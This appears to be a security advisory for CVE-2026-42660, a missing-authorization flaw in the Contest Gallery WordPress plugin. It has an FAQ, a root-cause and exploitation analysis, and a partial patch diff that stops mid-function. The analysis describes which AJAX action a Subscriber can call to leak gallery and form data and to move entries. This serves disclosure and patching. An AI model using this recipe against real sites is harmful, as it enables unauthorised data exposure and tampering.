What is CVE-2026-42660?

CVE-2026-42660 is a vulnerability in the Contest Gallery plugin for WordPress that allows authenticated attackers with Subscriber-level access to expose sensitive user and configuration data. This occurs due to missing authorization checks in AJAX handlers that process backend operations.

Who is affected by this vulnerability?

All users of the Contest Gallery plugin version 28.1.7 and earlier are affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

You can check your site’s version of the Contest Gallery plugin in the WordPress admin dashboard under ‘Plugins’. If you are running version 28.1.7 or earlier, your site is vulnerable to CVE-2026-42660.

How can I fix the vulnerability?

To mitigate this vulnerability, update the Contest Gallery plugin to version 29.0.0 or later, where the issue has been patched. Regularly updating plugins is essential for maintaining site security.

What does the CVSS score of 4.3 indicate?

The CVSS score of 4.3 indicates a medium severity level for this vulnerability. This means that while the risk is not critical, it is significant enough that administrators should take immediate action to mitigate potential exploitation.

What kind of sensitive information can be exposed?

Exploitation of this vulnerability can expose sensitive information such as gallery IDs, category structures, and contact form configurations. This data can be leveraged for further attacks or unauthorized modifications.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an authenticated Subscriber can send a crafted POST request to the vulnerable AJAX endpoint, triggering the exposure of sensitive data. It shows the steps to authenticate and exploit the vulnerability to retrieve sensitive information.

What are the potential impacts of this vulnerability?

If exploited, this vulnerability can allow an attacker to enumerate gallery IDs and their associated configurations, potentially leading to unauthorized access to private galleries or data corruption by moving entries between galleries.

What precautions can I take to enhance security?

In addition to updating vulnerable plugins, regularly review user roles and permissions, implement strong authentication methods, and monitor for unusual activity on your WordPress site to enhance overall security.

Is there a specific code path that is vulnerable?

Yes, the vulnerable code resides in the ‘ajax-functions-backend.php’ file, specifically in the functions ‘post_cg_move_to_another_gallery_get_inputs’ and ‘post_cg_move_to_another_gallery’, which lack proper authorization checks.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Contest Gallery plugin temporarily or restricting access to the WordPress admin area to prevent potential exploitation until you can apply the patch.

How can I stay informed about future vulnerabilities?

Subscribe to security bulletins from WordPress and relevant plugin developers, and consider using security plugins that monitor vulnerabilities to stay informed about potential risks and necessary updates.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 18, 2026

CVE-2026-42660: Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe <= 28.1.7 – Authenticated (Subscriber+) Sensitive Information Exposure (contest-gallery)

CVE ID CVE-2026-42660

Plugin contest-gallery

Severity Medium (CVSS 4.3)

CWE 200

Vulnerable Version 28.1.7

Patched Version 29.0.0

Disclosed April 28, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-42660:

This vulnerability exposes sensitive user and configuration data in the Contest Gallery plugin for WordPress, affecting all versions up to and including 28.1.7. The issue stems from missing capability checks on AJAX handlers that process backend operations. Authenticated attackers with Subscriber-level access can extract data that should only be available to administrators, editors, or authors. The CVSS score is 4.3, indicating a moderate severity information disclosure.

Root Cause: The vulnerable code path resides in `ajax-functions-backend.php`. The function `post_cg_move_to_another_gallery_get_inputs` (line range 352-275 in the diff) and the function `post_cg_move_to_another_gallery` both lacked proper authorization checks before processing requests. In the vulnerable version, `post_cg_move_to_another_gallery_get_inputs` directly outputs gallery IDs, contact forms, and category data to a “ tag without any permission validation. The `post_cg_move_to_another_gallery` function only performed a role check inside the AJAX handler but did not validate a nonce or gallery hash before processing the move operation. The patched version introduces `cg_backend_ajax_require_access_json()` which checks user capabilities and validates a WordPress nonce, and `cg_backend_ajax_validate_gallery_hash_json()` which validates a gallery-specific hash before allowing the operation.

Exploitation: An attacker authenticated as a Subscriber can trigger the `post_cg_move_to_another_gallery_get_inputs` AJAX action by sending a POST request to `/wp-admin/admin-ajax.php` with `action=post_cg_move_to_another_gallery_get_inputs`. This returns a JSON object containing `allCategoriesByGalleryID`, `galleryIDs`, and `contact_forms_by_gallery_id`, which reveal the full list of gallery IDs, their associated categories, and form input configurations. Alternatively, the attacker could call `post_cg_move_to_another_gallery` with crafted parameters to move gallery entries between galleries, using the previously leaked gallery IDs.

Patch Analysis: The patch introduces two new security functions. `cg_backend_ajax_require_access_json()` checks that the request is a valid AJAX request, the user is logged in with backend access, and a valid nonce (`cg_nonce`) is present. `cg_backend_ajax_validate_gallery_hash_json()` computes an MD5 hash using `wp_salt(‘auth’)` combined with the gallery ID and compares it to the provided `cgGalleryHash` parameter. Both `post_cg_move_to_another_gallery_get_inputs` and `post_cg_move_to_another_gallery` now call `cg_backend_ajax_require_access_json()` at the start, and the move function additionally validates the gallery hash. The get_inputs function now returns data via `wp_send_json_success()` instead of directly outputting to a script tag, ensuring proper JSON response format.

Impact: Successful exploitation allows a Subscriber-level attacker to enumerate all gallery IDs, their category structures, and contact form configurations. This information can be used to map out the site’s gallery architecture, potentially revealing private or unpublished galleries. Additionally, the attacker could move entries between galleries, causing data corruption or unauthorized modifications. The exposed configuration data could also aid in further attacks against the site or its users.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/contest-gallery/ajax/ajax-functions-backend.php
+++ b/contest-gallery/ajax/ajax-functions-backend.php
@@ -1,10 +1,60 @@
 <?php
+if (!function_exists('cg_backend_ajax_error_json')) {
+    function cg_backend_ajax_error_json($message, $status = 400, $code = 'cg_backend_ajax_error') {
+        wp_send_json_error(array(
+            'message' => $message,
+            'code' => $code
+        ), $status);
+    }
+}
+
+if (!function_exists('cg_backend_ajax_require_access_json')) {
+    function cg_backend_ajax_require_access_json() {
+        if (!defined('DOING_AJAX') || !DOING_AJAX) {
+            cg_backend_ajax_error_json('Invalid AJAX request.', 400, 'cg_invalid_ajax_request');
+        }
+
+        if (!is_user_logged_in() || !cg_user_has_backend_access()) {
+            cg_backend_ajax_error_json('This area can be edited only as administrator, editor or author.', 403, 'cg_missing_rights');
+        }
+
+        $cg_nonce = '';
+        if (isset($_POST['cg_nonce'])) {
+            $cg_nonce = sanitize_text_field($_POST['cg_nonce']);
+        } elseif (isset($_GET['cg_nonce'])) {
+            $cg_nonce = sanitize_text_field($_GET['cg_nonce']);
+        }
+
+        if (empty($cg_nonce) || !wp_verify_nonce($cg_nonce, 'cg_nonce')) {
+            wp_send_json_error(array(
+                'message' => 'WP nonce security token not set or not valid anymore.',
+                'code' => 'cg_nonce_invalid',
+                'version' => cg_get_version()
+            ), 403);
+        }
+    }
+}
+
+if (!function_exists('cg_backend_ajax_validate_gallery_hash_json')) {
+    function cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash) {
+        $GalleryID = absint($GalleryID);
+        if (empty($GalleryID) || empty($galleryHash)) {
+            cg_backend_ajax_error_json('Missing gallery validation data.', 403, 'cg_missing_gallery_hash');
+        }
+
+        $galleryHashToCompare = md5(wp_salt('auth') . '---cngl1---' . $GalleryID);
+        if ($galleryHash !== $galleryHashToCompare) {
+            cg_backend_ajax_error_json('Invalid gallery validation data.', 403, 'cg_invalid_gallery_hash');
+        }
+    }
+}
+
 // post_cg_get_current_permalinks
 add_action('wp_ajax_post_cg_get_current_permalinks', 'post_cg_get_current_permalinks');
 if (!function_exists('post_cg_get_current_permalinks')) {
     function post_cg_get_current_permalinks() {

-        cg_check_nonce();
+        cg_require_backend_access();

         global $wpdb;
         $tablename = $wpdb->prefix . "contest_gal1ery";
@@ -54,10 +104,8 @@

 // create PDF preview
 add_action('wp_ajax_post_cg_create_pdf_preview_backend', 'post_cg_create_pdf_preview_backend');
-if (!function_exists('post_cg_create_pdf_preview_backend')) {
-    function post_cg_create_pdf_preview_backend($WpUpload = 0, $realId = 0, $cg_base_64 = '', $isFromFrontendUpload = false) {
-
-        cg_check_nonce();
+if (!function_exists('cg_create_pdf_preview_internal')) {
+    function cg_create_pdf_preview_internal($WpUpload = 0, $realId = 0, $cg_base_64 = '', $isFromFrontendUpload = false) {

         global $wpdb;
         $tablename_posts = $wpdb->prefix . "posts";
@@ -67,138 +115,149 @@

         $_POST = cg1l_sanitize_post($_POST);

-        //var_dump(33444);
-        //var_dump($_POST);
+        $result = [
+            'ok' => false,
+            'attach_id' => 0,
+            'preview_url' => '',
+            'error' => ''
+        ];

-        // create image attachment
         $wp_upload_dir = wp_upload_dir();
-        $currentUploadDir = $wp_upload_dir['basedir'];
-        $cgWpUploadToReplace = '';
-        $cgNewWpUploadWhichReplace = '';
-        if(empty($WpUpload)){
-            $WpUpload = absint($_POST['cg_wp_upload']);
+        $cgWpUploadToReplace = 0;
+        $cgNewWpUploadWhichReplace = 0;
+        if (empty($WpUpload)) {
+            $WpUpload = (!empty($_POST['cg_wp_upload'])) ? absint($_POST['cg_wp_upload']) : 0;
         }
-        if(empty($realId)){
-            $realId = absint($_POST['cgRealId']);
+        if (empty($realId)) {
+            $realId = (!empty($_POST['cgRealId'])) ? absint($_POST['cgRealId']) : 0;
         }
-        if(empty($cg_base_64)){
+        if (empty($cg_base_64)) {
             $cg_base_64 = (!empty($_POST['cg_base_64'])) ? $_POST['cg_base_64'] : '';
         }
-        if(!empty($_POST['cgWpUploadToReplace'])){
+        if (!empty($_POST['cgWpUploadToReplace'])) {
             $cgWpUploadToReplace = absint($_POST['cgWpUploadToReplace']);
         }
-        if(!empty($_POST['cgNewWpUploadWhichReplace'])){
+        if (!empty($_POST['cgNewWpUploadWhichReplace'])) {
             $cgNewWpUploadWhichReplace = absint($_POST['cgNewWpUploadWhichReplace']);
         }

-        $realIdRow = $wpdb->get_row( "SELECT * FROM $tablename WHERE id='$realId'" );
-        $WpUploadRow = $wpdb->get_row( "SELECT * FROM $tablename_posts WHERE ID='$WpUpload'" );
+        if (empty($WpUpload) || empty($realId)) {
+            $result['error'] = 'missing_parameters';
+            return $result;
+        }
+
+        $realIdRow = $wpdb->get_row("SELECT * FROM $tablename WHERE id='$realId'");
+        if (empty($realIdRow)) {
+            $result['error'] = 'missing_real_id_row';
+            return $result;
+        }

-        //var_dump('$cgWpUploadToReplace456');
-        //var_dump($cgWpUploadToReplace);
-        //var_dump('$cgNewWpUploadWhichReplace456');
-        //var_dump($cgNewWpUploadWhichReplace);
+        $WpUploadRow = $wpdb->get_row("SELECT * FROM $tablename_posts WHERE ID='$WpUpload'");
+        if (empty($WpUploadRow)) {
+            $result['error'] = 'missing_wp_upload_row';
+            return $result;
+        }

-        if(!empty($cgWpUploadToReplace) && !empty($cgNewWpUploadWhichReplace)  && !empty($realIdRow->EcommerceEntry)){
+        if (!empty($cgWpUploadToReplace) && !empty($cgNewWpUploadWhichReplace) && !empty($realIdRow->EcommerceEntry)) {
             $EcommerceEntry = $realIdRow->EcommerceEntry;
-            $ecommerceEntry = $wpdb->get_row( "SELECT * FROM $tablename_ecommerce_entries WHERE id='$EcommerceEntry'" );
+            $ecommerceEntry = $wpdb->get_row("SELECT * FROM $tablename_ecommerce_entries WHERE id='$EcommerceEntry'");
             $removedWpUploadIdsFromSale = [$cgWpUploadToReplace];
-            //var_dump('cg_replace_ecommerce_file');
-            cg_replace_ecommerce_file($realIdRow->id, $realIdRow->GalleryID, $ecommerceEntry, $cgNewWpUploadWhichReplace, [],$removedWpUploadIdsFromSale);
+            cg_replace_ecommerce_file($realIdRow->id, $realIdRow->GalleryID, $ecommerceEntry, $cgNewWpUploadWhichReplace, [], $removedWpUploadIdsFromSale);
         }

-        // check multiple files
         $multipleFilesPdfPreview = 0;
         $multipleFilesTitle = '';
-        if(!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles!='""'){
+        if (!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles != '""') {
             $MultipleFiles = unserialize($realIdRow->MultipleFiles);
-            foreach($MultipleFiles as $file){
-                if(empty($file['isRealIdSource']) && $file['post_mime_type']=='application/pdf' && $file['WpUpload'] == $WpUpload && !empty($file['PdfPreview'])){
-                    // post_title
-                    $multipleFilesPdfPreview = $file['PdfPreview'];// set for multiple files then
+            foreach ($MultipleFiles as $file) {
+                if (empty($file['isRealIdSource']) && $file['post_mime_type'] == 'application/pdf' && $file['WpUpload'] == $WpUpload && !empty($file['PdfPreview'])) {
+                    $multipleFilesPdfPreview = $file['PdfPreview'];
                     $multipleFilesTitle = $file['post_title'];
                 }
             }
         }

-        //var_dump($realIdRow->PdfPreview);
-        //var_dump(get_post( $realIdRow->PdfPreview ));
-        if(!empty($realIdRow->PdfPreview) && !empty(get_post( $realIdRow->PdfPreview )) && $WpUpload == $realIdRow->WpUpload){
-            if(!$isFromFrontendUpload){
-                $PdfPreviewImage = wp_get_attachment_image_src($realIdRow->PdfPreview, 'large');
-                echo 'cg_guid###'.$PdfPreviewImage[0].'###cg_guid_end';
-            }
-        }elseif(!empty($multipleFilesPdfPreview) && !empty(get_post($multipleFilesPdfPreview))){// set for multiple files then
-            if(!$isFromFrontendUpload){
-                $multipleFilesPdfPreviewImage = wp_get_attachment_image_src($multipleFilesPdfPreview, 'large');
-                echo 'cg_guid###'.$multipleFilesPdfPreviewImage[0].'###cg_guid_end';
-            }
-        }else{
-            //var_dump(222);
+        if (!empty($realIdRow->PdfPreview) && !empty(get_post($realIdRow->PdfPreview)) && $WpUpload == $realIdRow->WpUpload) {
+            $PdfPreviewImage = wp_get_attachment_image_src($realIdRow->PdfPreview, 'large');
+            $result['ok'] = true;
+            $result['attach_id'] = absint($realIdRow->PdfPreview);
+            $result['preview_url'] = (!empty($PdfPreviewImage[0])) ? $PdfPreviewImage[0] : '';
+            return $result;
+        } elseif (!empty($multipleFilesPdfPreview) && !empty(get_post($multipleFilesPdfPreview))) {
+            $multipleFilesPdfPreviewImage = wp_get_attachment_image_src($multipleFilesPdfPreview, 'large');
+            $result['ok'] = true;
+            $result['attach_id'] = absint($multipleFilesPdfPreview);
+            $result['preview_url'] = (!empty($multipleFilesPdfPreviewImage[0])) ? $multipleFilesPdfPreviewImage[0] : '';
+            return $result;
+        } else {
             $content = base64_decode(preg_replace('#^data:image/w+;base64,#i', '', $cg_base_64));
+            if (empty($content)) {
+                $result['error'] = 'missing_preview_payload';
+                return $result;
+            }
+
             $formImage = imagecreatefromstring($content);
+            if (!$formImage) {
+                $result['error'] = 'invalid_preview_payload';
+                return $result;
+            }

-            if(!empty($multipleFilesPdfPreview)){
-                $fullName = $multipleFilesTitle.'-cg-pdf-preview';
-            }else{
-                $fullName = $WpUploadRow->post_title.'-cg-pdf-preview';
+            if (!empty($multipleFilesPdfPreview)) {
+                $fullName = $multipleFilesTitle . '-cg-pdf-preview';
+            } else {
+                $fullName = $WpUploadRow->post_title . '-cg-pdf-preview';
             }
             $fullNamePath = $fullName;
             $fullNamePath = cg_pre_process_name_for_url_name($fullNamePath);
             $fullNamePath = cg_check_first_char_for_url_name_after_pre_processing($fullNamePath);
             $fullNamePath = cg_check_last_char_for_url_name_after_pre_processing($fullNamePath);
-            $fullNamePath = cg_sluggify_for_url($fullNamePath);// has to be tested with asia chars one time
+            $fullNamePath = cg_sluggify_for_url($fullNamePath);
             $fullNamePathFirst = $fullNamePath;

-            //var_dump('$fullName');
-            //var_dump($fullName);
-
-            $fullPath = $wp_upload_dir['basedir'].$wp_upload_dir['subdir'].'/'.$fullNamePathFirst.'.png';
-            //var_dump('$fullPath check');
-            //var_dump($fullPath);
-            if(file_exists($fullPath)){
-                //var_dump(112233);
+            $fullPath = $wp_upload_dir['basedir'] . $wp_upload_dir['subdir'] . '/' . $fullNamePathFirst . '.png';
+            if (file_exists($fullPath)) {
                 $i = 0;
-                do{
-                    if($i==0){
+                do {
+                    if ($i == 0) {
                         $i = 1;
-                    }else{
+                    } else {
                         $i++;
                     }
-                    $add = '-'.$i;
-                    $fullNamePath = $fullNamePathFirst.$add;
-                    $fullPath = $wp_upload_dir['basedir'].$wp_upload_dir['subdir'].'/'.$fullNamePath.'.png';
-                }while(file_exists($fullPath));
+                    $add = '-' . $i;
+                    $fullNamePath = $fullNamePathFirst . $add;
+                    $fullPath = $wp_upload_dir['basedir'] . $wp_upload_dir['subdir'] . '/' . $fullNamePath . '.png';
+                } while (file_exists($fullPath));
             }

-            //var_dump('$fullPath');
-            //var_dump($fullPath);
-
-            //var_dump('$fullName');
-            //var_dump($fullName);
-
-            // for png
-            imagesavealpha($formImage,true);// required for png images... otherwise background black
-
-            //imagejpeg($formImage,$WpUploadFilesPostBaseUrls[$base64WatermarkedAndAltFilesWpUploadId]);
-            //imagegif($formImage,$WpUploadFilesPostBaseUrls[$base64WatermarkedAndAltFilesWpUploadId]);
-            imagepng($formImage,$fullPath);
-
-            //file_put_contents($fullNewPath,$content);
+            imagesavealpha($formImage, true);
+            imagepng($formImage, $fullPath);
+
+            if (!file_exists($fullPath)) {
+                imagedestroy($formImage);
+                $result['error'] = 'preview_file_not_created';
+                return $result;
+            }

             $attachment = array(
-                'guid' => $wp_upload_dir['url']."/".$fullNamePath.'.png',
+                'guid' => $wp_upload_dir['url'] . "/" . $fullNamePath . '.png',
                 'post_mime_type' => 'image/png',
                 'post_title' => $fullName,
                 'post_content' => '',
                 'post_status' => 'inherit'
             );

-            $attach_id = wp_insert_attachment( $attachment, $fullPath );
-            $imagenew = get_post( $attach_id );
-            $fullsizepath = get_attached_file( $imagenew->ID );
-            $attach_data = wp_generate_attachment_metadata( $attach_id, $fullsizepath );
-            wp_update_attachment_metadata( $attach_id, $attach_data );
+            $attach_id = wp_insert_attachment($attachment, $fullPath);
+            if (empty($attach_id) || is_wp_error($attach_id)) {
+                imagedestroy($formImage);
+                $result['error'] = 'preview_attachment_insert_failed';
+                return $result;
+            }
+
+            $imagenew = get_post($attach_id);
+            $fullsizepath = get_attached_file($imagenew->ID);
+            $attach_data = wp_generate_attachment_metadata($attach_id, $fullsizepath);
+            wp_update_attachment_metadata($attach_id, $attach_data);
+            imagedestroy($formImage);

             $wpdb->query($wpdb->prepare(
                 "
@@ -206,37 +265,30 @@
 						(id, WpUpload, WpUploadPreview)
 						VALUES ( %s,%d,%d)
 					",
-                '',$WpUpload,$attach_id
+                '', $WpUpload, $attach_id
             ));

             $multipleFilesWpUploadForPdfPreview = 0;

-            if(!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles!='""'){
+            if (!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles != '""') {
                 $MultipleFiles = unserialize($realIdRow->MultipleFiles);
-                foreach($MultipleFiles as $file){
-                    if(empty($file['isRealIdSource']) && $file['post_mime_type']=='application/pdf' && $file['WpUpload'] == $WpUpload){
+                foreach ($MultipleFiles as $file) {
+                    if (empty($file['isRealIdSource']) && $file['post_mime_type'] == 'application/pdf' && $file['WpUpload'] == $WpUpload) {
                         $multipleFilesWpUploadForPdfPreview = $WpUpload;
                     }
                 }
             }

-            //var_dump('$multipleFilesWpUploadForPdfPreview');
-            //var_dump($multipleFilesWpUploadForPdfPreview);
-
-            if(!empty($multipleFilesWpUploadForPdfPreview)){
-                //var_dump('$multipleFilesPdfPreview');
-                //var_dump($multipleFilesPdfPreview);
+            if (!empty($multipleFilesWpUploadForPdfPreview)) {
                 $MultipleFiles = unserialize($realIdRow->MultipleFiles);
                 $MultipleFilesNew = [];
-                foreach($MultipleFiles as $order => $file){
-                    if(empty($file['isRealIdSource']) && $file['post_mime_type']=='application/pdf' && $file['WpUpload'] == $WpUpload && $multipleFilesWpUploadForPdfPreview == $WpUpload){
-                        //var_dump('set PdfPreview');
+                foreach ($MultipleFiles as $order => $file) {
+                    if (empty($file['isRealIdSource']) && $file['post_mime_type'] == 'application/pdf' && $file['WpUpload'] == $WpUpload && $multipleFilesWpUploadForPdfPreview == $WpUpload) {
                         $file['PdfPreview'] = $attach_id;
                         $PdfPreviewImage = wp_get_attachment_image_src($attach_id, 'full');
                         $file['PdfPreviewImage'] = $PdfPreviewImage[0];
                         $PdfPreviewImageLarge = wp_get_attachment_image_src($attach_id, 'large');
                         $file['PdfPreviewImageLarge'] = $PdfPreviewImageLarge[0];
-                        // important to set PdfOriginal
                         $file['PdfOriginal'] = get_the_guid($file['WpUpload']);
                         $file['full'] = $PdfPreviewImage[0];
                         $file['guid'] = $PdfPreviewImage[0];
@@ -251,42 +303,46 @@
                     }
                     $MultipleFilesNew[$order] = $file;
                 }
-                /*echo "<pre>";
-                    print_r($MultipleFilesNew);
-                echo "</pre>";*/
                 $MultipleFilesNew = serialize($MultipleFilesNew);
-                //var_dump('$realId set MultipleFiles');
-                //var_dump($realId);
-                // SET MultipleFiles='$MultipleFilesNew' ... serialized $MultipleFilesNew has to be in ''
                 $wpdb->query("UPDATE $tablename SET MultipleFiles='$MultipleFilesNew' WHERE id = $realId");
-            }else{
-                //var_dump('$realId set PdfPreview');
+            } else {
                 $wpdb->query("UPDATE $tablename SET PdfPreview=$attach_id WHERE id = $realId");
             }

-            if(!$isFromFrontendUpload){
-                if(!empty($realIdRow->Active)){
-                    $uploadFolder = wp_upload_dir();
-                    $thumbSizesWp = array();
-                    $thumbSizesWp['thumbnail_size_w'] = get_option("thumbnail_size_w");
-                    $thumbSizesWp['medium_size_w'] = get_option("medium_size_w");
-                    $thumbSizesWp['large_size_w'] = get_option("large_size_w");
-                    $imageArray = array();
-                    $pid = $realIdRow->id;
-                    $GalleryID = $realIdRow->GalleryID;
-                    $row = $wpdb->get_row( "SELECT DISTINCT $tablename_posts.*, $tablename.* FROM $tablename_posts, $tablename WHERE
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $tablename_posts.ID = $tablename.WpUpload)
-                          OR
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
+            if (!$isFromFrontendUpload && !empty($realIdRow->Active)) {
+                $uploadFolder = wp_upload_dir();
+                $thumbSizesWp = array();
+                $thumbSizesWp['thumbnail_size_w'] = get_option("thumbnail_size_w");
+                $thumbSizesWp['medium_size_w'] = get_option("medium_size_w");
+                $thumbSizesWp['large_size_w'] = get_option("large_size_w");
+                $imageArray = array();
+                $pid = $realIdRow->id;
+                $GalleryID = $realIdRow->GalleryID;
+                $row = $wpdb->get_row("SELECT DISTINCT $tablename_posts.*, $tablename.* FROM $tablename_posts, $tablename WHERE
+                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $tablename_posts.ID = $tablename.WpUpload)
+                          OR
+                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
                           GROUP BY $tablename.id  ORDER BY $tablename.id DESC LIMIT 0, 1");
-                    cg_create_json_files_when_activating($GalleryID,$row,$thumbSizesWp,$uploadFolder,$imageArray);
-                }
+                cg_create_json_files_when_activating($GalleryID, $row, $thumbSizesWp, $uploadFolder, $imageArray);
+            }

-                $PdfPreviewImage = wp_get_attachment_image_src($attach_id, 'large');
-                $PdfPreviewImage = $PdfPreviewImage[0];
+            $PdfPreviewImage = wp_get_attachment_image_src($attach_id, 'large');

-                echo 'cg_guid###'.$PdfPreviewImage.'###cg_guid_end';
-            }
+            $result['ok'] = true;
+            $result['attach_id'] = absint($attach_id);
+            $result['preview_url'] = (!empty($PdfPreviewImage[0])) ? $PdfPreviewImage[0] : '';
+            return $result;
+        }
+    }
+}
+if (!function_exists('post_cg_create_pdf_preview_backend')) {
+    function post_cg_create_pdf_preview_backend($WpUpload = 0, $realId = 0, $cg_base_64 = '', $isFromFrontendUpload = false) {
+        cg_require_backend_access();
+        $result = cg_create_pdf_preview_internal($WpUpload, $realId, $cg_base_64, $isFromFrontendUpload);
+        if (!empty($result['ok']) && !$isFromFrontendUpload && !empty($result['preview_url'])) {
+            echo 'cg_guid###' . $result['preview_url'] . '###cg_guid_end';
+        } elseif (empty($result['ok'])) {
+            echo 'cg_error###' . $result['error'] . '###cg_error_end';
         }
     }
 }
@@ -296,212 +352,275 @@
 if (!function_exists('post_cg_move_to_another_gallery_get_inputs')) {
 	function post_cg_move_to_another_gallery_get_inputs() {

-    global $wpdb;
-    $tablename_form_input = $wpdb->prefix . "contest_gal1ery_f_input";
-    $tablenameOptions = $wpdb->prefix . "contest_gal1ery_options";
-    $tablename_categories = $wpdb->prefix . "contest_gal1ery_categories";
+        cg_backend_ajax_require_access_json();
+        $_POST = cg1l_sanitize_post($_POST);

-    $contact_forms = $wpdb->get_results("SELECT * FROM $tablename_form_input WHERE id > 0");
+        $MoveFromGalleryID = (!empty($_POST['cgMoveFromGalleryID'])) ? absint($_POST['cgMoveFromGalleryID']) : 0;
+        $galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';
+        cg_backend_ajax_validate_gallery_hash_json($MoveFromGalleryID, $galleryHash);

-    $contact_forms_by_gallery_id = [];
-    foreach ($contact_forms as $form){
-        if(!isset($contact_forms_by_gallery_id[$form->GalleryID])){
-	        $contact_forms_by_gallery_id[$form->GalleryID] = [];
-        }
-	    if(is_serialized($form->Field_Content)){
-		    $form->Field_Content = unserialize($form->Field_Content);
+        global $wpdb;
+        $tablename_form_input = $wpdb->prefix . "contest_gal1ery_f_input";
+        $tablenameOptions = $wpdb->prefix . "contest_gal1ery_options";
+        $tablename_categories = $wpdb->prefix . "contest_gal1ery_categories";
+
+        $contact_forms = $wpdb->get_results("SELECT * FROM $tablename_form_input WHERE id > 0");
+
+        $contact_forms_by_gallery_id = [];
+        foreach ($contact_forms as $form){
+            if(!isset($contact_forms_by_gallery_id[$form->GalleryID])){
+                $contact_forms_by_gallery_id[$form->GalleryID] = [];
+            }
+            if(is_serialized($form->Field_Content)){
+                $form->Field_Content = unserialize($form->Field_Content);
+            }
+            $contact_forms_by_gallery_id[$form->GalleryID][] = $form;
         }
-	    $contact_forms_by_gallery_id[$form->GalleryID][] = $form;
-    }

-		$galleryIDs = $wpdb->get_results("SELECT id FROM $tablenameOptions WHERE id >= 1 ORDER BY id DESC");
-		$allCategoriesByGalleryID = $wpdb->get_results("SELECT id, GalleryID, Name FROM $tablename_categories WHERE id >= 1 ORDER BY id DESC");
-		$allCategoriesByGalleryIDArray = [];
+        $galleryIDs = $wpdb->get_results("SELECT id FROM $tablenameOptions WHERE id >= 1 ORDER BY id DESC");
+        $allCategoriesByGalleryID = $wpdb->get_results("SELECT id, GalleryID, Name FROM $tablename_categories WHERE id >= 1 ORDER BY id DESC");
+        $allCategoriesByGalleryIDArray = [];
         foreach ($allCategoriesByGalleryID as $row){
             if(!isset($allCategoriesByGalleryIDArray[$row->GalleryID])){
-	            $allCategoriesByGalleryIDArray[$row->GalleryID] = [];
+                $allCategoriesByGalleryIDArray[$row->GalleryID] = [];
             }
-	        $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id] = [];
-	        $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['id'] = $row->id;
-	        $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['name'] = $row->Name;
+            $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id] = [];
+            $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['id'] = $row->id;
+            $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['name'] = $row->Name;
         }

-		?>
-    <script data-cg-processing="true">
-        cgJsClassAdmin.gallery.vars.allCategoriesByGalleryID = <?php echo json_encode($allCategoriesByGalleryIDArray);?>;
-        cgJsClassAdmin.gallery.vars.galleryIDs = <?php echo json_encode($galleryIDs);?>;// renew here for sure
-        cgJsClassAdmin.gallery.vars.contact_forms_by_gallery_id = <?php echo json_encode($contact_forms_by_gallery_id); ?>;
-    </script>
-<?php
+        wp_send_json_success(array(
+            'allCategoriesByGalleryID' => $allCategoriesByGalleryIDArray,
+            'galleryIDs' => $galleryIDs,
+            'contact_forms_by_gallery_id' => $contact_forms_by_gallery_id
+        ));

         }
-}
+	}

 // move to another gallery
 add_action('wp_ajax_post_cg_move_to_another_gallery', 'post_cg_move_to_another_gallery');
 if (!function_exists('post_cg_move_to_another_gallery')) {
 	function post_cg_move_to_another_gallery()
 	{
+		cg_backend_ajax_require_access_json();
 		contest_gal1ery_db_check();

 		$_POST = cg1l_sanitize_post($_POST);

-		$isBackendCall = true;
-		$isAjaxCall = true;
-
-		$isAjaxCategoriesCall = true;
-
-		global $wp_version;
-		$sanitize_textarea_field = ($wp_version < 4.7) ? 'sanitize_text_field' : 'sanitize_textarea_field';
+		$cgMoveRealId = (!empty($_POST['cgMoveRealId'])) ? absint($_POST['cgMoveRealId']) : 0;
+		$InGalleryIDtoMove = (!empty($_POST['cg_in_gallery_id_to_move'])) ? absint($_POST['cg_in_gallery_id_to_move']) : 0;
+		$MoveFromGalleryID = (!empty($_POST['cgMoveFromGalleryID'])) ? absint($_POST['cgMoveFromGalleryID']) : 0;
+		$cgMoveCategory = (!empty($_POST['cgMoveCategory'])) ? absint($_POST['cgMoveCategory']) : 0;
+		$MoveAssignsRaw = (!empty($_POST['cgMoveAssigns']) && is_array($_POST['cgMoveAssigns'])) ? $_POST['cgMoveAssigns'] : array();
+		$galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';

-		$cgVersion = cg_get_version_for_scripts();
+		cg_backend_ajax_validate_gallery_hash_json($MoveFromGalleryID, $galleryHash);

-		if (defined('DOING_AJAX') && DOING_AJAX) {
-
-			$user = wp_get_current_user();
+		if (empty($cgMoveRealId) || empty($InGalleryIDtoMove) || empty($MoveFromGalleryID)) {
+			cg_backend_ajax_error_json('Missing move request data.', 400, 'cg_missing_move_data');
+		}

-			if (
-				is_super_admin($user->ID) ||
-				in_array('administrator', (array)$user->roles) ||
-				in_array('editor', (array)$user->roles) ||
-				in_array('author', (array)$user->roles)
-			) {
+		if ($InGalleryIDtoMove == $MoveFromGalleryID) {
+			cg_backend_ajax_error_json('Entry can not be moved to the same gallery.', 400, 'cg_same_gallery_move');
+		}

-				$cgMoveRealId = absint($_POST['cgMoveRealId']);
